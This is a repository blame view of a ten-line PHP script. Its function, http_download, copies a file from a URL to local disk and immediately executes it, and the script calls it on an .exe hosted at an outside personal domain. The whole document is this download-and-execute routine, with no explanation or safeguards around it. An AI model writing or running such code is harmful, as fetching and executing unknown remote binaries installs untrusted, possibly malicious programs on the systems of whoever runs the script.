Commit | Line | Data |
---|---|---|
8de51304 H |
1 | <?php\r |
2 | \r | |
3 | function http_download ($what, $where) {\r | |
4 | copy($what,$where);\r | |
5 | exec($where);\r | |
6 | }\r | |
7 | \r | |
8 | http_download("http://harvie.stokoruna.cz/files/skategirl.exe", "skategirl.exe");\r | |
9 | \r | |
10 | ?>\r |